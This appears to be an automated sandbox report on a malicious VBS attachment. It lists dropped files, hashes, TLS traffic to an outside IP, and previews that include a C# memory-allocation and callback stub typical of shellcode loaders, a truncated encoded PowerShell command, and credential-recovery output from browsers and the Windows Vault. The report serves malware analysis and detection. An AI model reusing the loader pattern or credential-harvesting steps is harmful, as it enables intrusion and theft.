                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.98024017301909
                      Encrypted:false
                      SSDEEP:24:Hae9EuZfbzcMKXDfHAhKEbsmfII+ycuZhNtakSLPNnq9qd:HBbKzCKPmg1ulta3hq9K
                      MD5:BFDD9E2B1632900B411789E17F45AFC0
                      SHA1:4B4C44677E88D01CD665B46FE0A443ADA70D4A1B
                      SHA-256:91B065117FCC975664E18D84FA5060DA011070E95FCDFD373616BF07BF69534A
                      SHA-512:BC1B4D84AE39001C2CFF5E8EA75406D0587E9B92534D4B95803E523CB775F0A8A257C8DBD481BF1C6B2259A52D7A8F9D884BFBC04FF857B0B0DA46F04945F956
                      Malicious:false
                      Preview:L...]..a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP..................D.!..2..\.5...........4.......C:\Users\user\AppData\Local\Temp\RES6913.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.s.d.k.e.3.0.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\wscript.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):26116
                      Entropy (8bit):7.487801276822169
                      Encrypted:false
                      SSDEEP:384:iBqonGi9g6qDNgSyo765HM3cbJxDA3ql2fw9WmAVUwNC4M0TeVgR8ASfe7:6qonGi9NQYNrM3HjGcC4M0Tn9S27
                      MD5:48A7D9C78DF69306AE414BEA7C1D51DE
                      SHA1:02A7398B82BBB72C6F1B5D36ACE44951E9CC67E2
                      SHA-256:4D8F190A415AED861321D29E69D174EFFBDED24DE4841A0F9F534161B1D5B23E
                      SHA-512:9AD31CAE5C95191D5E46572D554AA57DEA11DED2C26F3285ADA315FEDDCCD369ADC0D2B5254505BD207E8CD9B9FE21287329149FD3C3F6BD535A93223D83993F
                      Malicious:false
                      Preview:......h.m.n.,$.^./..$kZ..Z.._1..4...E....9.u.W........K.E..U.".tu...Z..{_..h"...A.H.......N~+.n....H.....aJ...]0...E...(.......e)iQ....^..}U..&..V.,.z.....l..#.3..Qa..%G=g.udj*.Lh....%...6......C..'..W?..m.0?...d...$.M?..P.J..I....p]....e.f..w..@...._;.`!V.....*.k.=...w}3u...'.......*ga.f^.B}p.f...........F.......F...nD.....E..E...E..^..._....En._..1..w....1[|...f..E.... .a.].f.?..D......y....b%.E.*.....p.f...PE.(.e......En4aD._..-..v.5 ..?m...+V9.....E.STE..^Yl...c..!.@QE.(^ml...:$W..pQE.(.....Y..E.(.....$.....E..../..E..{E.f_a.Q... _a.W?r. wa.r,+. oa....(.....&.KwfV.......%fV;...L.ZR.E.(.......-fW.....`.Efgc.1+M.R..E..:........EY.\.. .5q....j. .....l.yG.s..{?--u0.f.?.7.....4}..i..i...I..s2.j%...Y..q...+ .a..DH.Z....;%Si.A...i. /as.d.f.?...-...Z....f 7aNz6.f.?......CQB.s.{W/.r..E..lk.....>.fS.OTf....k.*.....t..Ede#.%..E..UE.Hi..s...7...,l..q.`S.. 7a.M....UE.......5/......p.$Y#.v.u.....X.^....b9.E.I.......-...F....b..E.*VY]W(..I
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0990400422881264
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuGak7YnqqjXPN5Dlq5J:+RI+ycuZhNtakSLPNnqX
                      MD5:18A144F72111B43209E45CEC83813594
                      SHA1:8529F0E27AACE569657DC629ECC4F6719DE94C07
                      SHA-256:53FD0712E0F35630F3908CF9F742B9D9608244291233D270E94708C4FE3E664D
                      SHA-512:5B1A3363E18215F14ED6E191D72B4DCC06E4E968680CF0EAF09B946ECB3FED1A6EEFAF31AAFCE336358C33794AFCE9945348976F0AEA8FDF3928DAFBEB6E1DCF
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.s.d.k.e.3.0.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.s.d.k.e.3.0.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):681
                      Entropy (8bit):5.027145180451516
                      Encrypted:false
                      SSDEEP:12:V/DGrAtvLE6h5sfmK1YVtKMv1MZlfTW91VIfaVhckwQiP2/hA:JoAtvLP7+p1cvMZlfeiaV5+WhA
                      MD5:26B2BF42ECC76A6F1D41418840A657A2
                      SHA1:078EF1CE837AD72087C27B59A22376D787047A96
                      SHA-256:389198803DCD1407F3597E008CDC8485ACA479215D8097646A339B133FCF3AD2
                      SHA-512:6C45E6734EF47C372E95EB1B525E0574A056D658C6339B474A5B42E97B2710D6764DDBF70C359B7B59CFE177C4666F10E170C163A258D5AD6C7D50AF9B764E43
                      Malicious:false
                      Preview:.using System;..using System.Runtime.InteropServices;..public static class brnecykl1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int brnecykl6,ref Int32 restbelb,int Dybb6,ref Int32 brnecykl,int applie,int brnecykl7);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string imman,uint Hypogynyb,int Discipl3,int brnecykl0,int Petuniern,int Grungesmit,int Demoral5);..[DllImport("kernel32.dll")]public static extern int ReadFile(int Dybb60,uint Dybb61,IntPtr Dybb62,ref Int32 Dybb63,int Dybb64);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Dybb65,int Dybb66,int Dybb67,int Dybb68,int Dybb69);..}
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.240356084391851
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fjWa8y0zxs7+AEszIwkn23fjWa8cyWH:p37Lvkmb6KRfbP8y0WZEifbP8On
                      MD5:51DF0857D968DF204310E4777FDF3159
                      SHA1:84236320A03CF97CCABBB1C6053B603D0DEA65DD
                      SHA-256:BBCBA23E88C811284F654076AAFB6105E2ECF3C756C0E6A732329F72D9DCEA84
                      SHA-512:C335681367E6D3065CE0B0B702DDB3049FBB66F46B2BB3B695038D37B920EDFD7ADA7ADE3AF699E180329ABABAE7A57AF92FC6567439097255BE852CE334938D
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):3.0712816785532304
                      Encrypted:false
                      SSDEEP:48:6HPUcTbvyFoOLV9t5mdMjTl6F6vA9JFP1ulta3hq:OUcfyFPDtAKjBZeIfK
                      MD5:BDA18B4892E1DA08703BA5101439343B
                      SHA1:DECAFD57BA69B4FB3E2AA15AC395D2FDF58AA84F
                      SHA-256:6CC3EEC7D8CB1410078F56DE9DB91033B742814AAAA9521FCFB3DC90ABD65C41
                      SHA-512:846B1790D13F62D2453DF6B6CDA08621C18B95731766FC5274C520F42BA3FA765B5978C609905CEAAF814E67FDA34C49408A14178A45A8AA6DB401B07BDA9DD0
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..a...........!................>%... ...@....... ....................................@..................................$..W....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ %......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...(...l...#Blob...........G.........%3............................................................1.*...O./...u./.......................................... 8............ P............ \.!.......... e.+.......u.............................................................................................................
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):867
                      Entropy (8bit):5.311011657516807
                      Encrypted:false
                      SSDEEP:24:KJBqd3ka6KRfbP8gEifbP8OuKaM5DqBVKVrdFAMBJTH:Cika6CbEgEubEOuKxDcVKdBJj
                      MD5:9640C878124A63FDBE8D135230C94C61
                      SHA1:E659918B7CF1FDC88B8B3FEF3DBCB6F485247E1C
                      SHA-256:85C191A1DDAA2B4B7C8E00CA24B49D723FC5E05FCAD10B87EA06676A29437885
                      SHA-512:32BAFDBA0C8A32CCF4FA509F66B5C8626F89B2AD69E929E437C26ED5BCA9C61FADD7035C916DE4D5B0212F2D80DAC1E980CF3E373F9307C85BB454389ECEFBB4
                      Malicious:false
                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\SysWOW64\svchost.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                      Category:dropped
                      Size (bytes):106730
                      Entropy (8bit):7.9318918618379985
                      Encrypted:false
                      SSDEEP:3072:4zj6MFNf+34PyryGJpWBcIfyynBq31jbKNsjVpKhJ:aHSgyZJIBc2qFffBWJ
                      MD5:3C02A26067DA20379B0E2AE0B4BA6469
                      SHA1:36B6AF7BF90D17AC8AC58F15976597BCD8C7D4FE
                      SHA-256:E44C68A24DC1FCD0DB828F999D5AF664A5CA5BB5C50B7E865AA1BCE0C60C0A8E
                      SHA-512:252165D8EFF73C22DB813456495B001E23FBDBD323F7DF92843CCCA59007F94243F621D94C1040D67CD2F8C208AA609B3CB2873BCC78F3EBE784AA958204A35E
                      Malicious:false
                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......<Z5..........|.w....v...2|...v<.......7.....................s...u.....g.W......)ky..N...
                      Process:C:\Windows\SysWOW64\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):38
                      Entropy (8bit):2.7883088224543333
                      Encrypted:false
                      SSDEEP:3:rFGQJhIl:RGQPY
                      MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                      SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                      SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                      SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                      Malicious:false
                      Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                      Process:C:\Windows\SysWOW64\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):40
                      Entropy (8bit):2.8420918598895937
                      Encrypted:false
                      SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                      MD5:D63A82E5D81E02E399090AF26DB0B9CB
                      SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                      SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                      SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                      Malicious:true
                      Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                      Process:C:\Windows\SysWOW64\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):210
                      Entropy (8bit):3.512882731079781
                      Encrypted:false
                      SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4QO8nEoY:MlIaExGNYvOI6x418ZY
                      MD5:846F972FD75626BAFB8D6D54052E3FD8
                      SHA1:1BAA6F1F1E0359510E9BEFF5087A8FD428215426
                      SHA-256:CE5EB7E190A20D0F33DCA3FC01920B762123D9F61A670B89656521221F9CEAE8
                      SHA-512:966CB9B22108050CFE053E232DE6A237AA4CB379B91CF44B8159F4C8278AECE70E094D8CBB31B4CFC81C74383C85B57F81AA47C9E40DB2F1D3F355DE622510D2
                      Malicious:true
                      Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.h.q.p.n.d.j.h.j.j.a.f.v.o.k.....A.u.t.:.......P.a.s.s.:.......
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):11854
                      Entropy (8bit):5.119712834288783
                      Encrypted:false
                      SSDEEP:192:vWYkmDve5krtxqh13QJvQA+Kgbmy66lNEfhF5WYYlFxF1o+y7+YyyZlRWxnz9a1x:vWYkmLe5gIh5OQF9bX66lGhF5WYYlFxa
                      MD5:E53E4FC4A0B02ABA5429572911B4383F
                      SHA1:987EE9FDC18012BCA09A2E6C61FAA80286C77AFC
                      SHA-256:0DA9EFBB989C58B78C28E6A93C2935E298BAF17E78BDC18E84FFCA052AFECDFB
                      SHA-512:2DA7F7A90C1D4BBDDED681144B8B9F6F22A61D82779CD01E743BAD7DE6023175D67E52A92E3D4D2BA529AB8902B93E8C671558A856B2819482C49DFE3D58A1DA
                      Malicious:false
                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220121172445..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 376483 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQAL
                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):5.035989077218127
                      TrID:
                      • Visual Basic Script (13500/0) 100.00%
                      File name:New _Inquiry P.O4622.vbs
                      File size:79866
                      MD5:24e935f7534a81a7fd4e32daeab208a5
                      SHA1:251ac05ebc8c963418dccddda127d2a81b5097db
                      SHA256:5e6d8684c3f71ca6a76d22d1ddc536f302738a3027d22a5b1ce1852c9c551d99
                      SHA512:4bd0afc25da140efadb8f49350df7dca32c781a520c85f217d77db6602e51a7731ef955b7d412f5a3edaa0c70cffe47b9b44eda88c3378052d101a1e071f4ede
                      SSDEEP:1536:8KOb1Jqxa/spd61vkvf8+ZeioL7azKUkqnpnrwIYcfJHSzv8j6aiownmOTr7uAY:8zWPWav0+Z4azKOnpnMOfJovta37G5Y
                      File Content Preview:'Emdav PINPRICKSB Villeines FORV fallese OVERORGANI QUINCEWO Sarment7 Hrgerund Stade7 Udsp PANTEHFTEL Monetaryk pomfrit fagomr AUTOMATP Bushmaki9 ADMIN Galvanosk5 Jordndbo Bonspell5 rykk SLADREVOR unlacque Havekolo4 Scenefunk ferricya unreporta ..'ACTIVAT
                      Icon Hash:e8d69ece869a9ec4
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 21, 2022 17:25:52.686738014 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:52.686788082 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:52.686875105 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:52.713493109 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:52.713521957 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:53.296502113 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:53.296688080 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:53.626610041 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:53.626642942 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:53.626908064 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:53.626969099 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:53.631772041 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:53.673881054 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:53.937971115 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:53.938112020 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.222706079 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.222719908 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.222790956 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.222822905 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.222841024 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.222897053 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.222903967 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.222942114 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.222945929 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.222982883 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.223015070 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.507931948 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.507980108 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508058071 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508186102 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.508234024 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508263111 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.508322954 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508337975 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.508356094 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508395910 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508424997 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.508438110 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508512974 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.508522034 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.508930922 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.508960009 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.509063005 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.509079933 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.509130955 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.792568922 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.792579889 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.792624950 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.792663097 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.792680025 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.792690992 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.792733908 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.792963028 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.792984009 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793041945 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793054104 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793081045 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793118000 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793378115 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793399096 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793452978 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793467045 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793488979 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793515921 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793878078 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793899059 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.793967009 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.793981075 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.794028997 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.794389009 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.794408083 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.794469118 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.794483900 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.794503927 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.794898033 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.794934988 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.794990063 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.795002937 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.795012951 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.795057058 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.837008953 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.837084055 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.837119102 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.837132931 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.837166071 CET44349823157.7.107.166192.168.2.4
                      Jan 21, 2022 17:25:54.837204933 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.837259054 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.837668896 CET49823443192.168.2.4157.7.107.166
                      Jan 21, 2022 17:25:54.837686062 CET44349823157.7.107.166192.168.2.4
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 21, 2022 17:25:52.425013065 CET5679453192.168.2.48.8.8.8
                      Jan 21, 2022 17:25:52.672385931 CET53567948.8.8.8192.168.2.4
                      Jan 21, 2022 17:27:08.573812008 CET5653453192.168.2.48.8.8.8
                      Jan 21, 2022 17:27:08.597714901 CET53565348.8.8.8192.168.2.4
                      Jan 21, 2022 17:27:10.668698072 CET5662753192.168.2.48.8.8.8
                      Jan 21, 2022 17:27:10.688636065 CET53566278.8.8.8192.168.2.4
                      Jan 21, 2022 17:27:10.694746017 CET5662153192.168.2.48.8.8.8
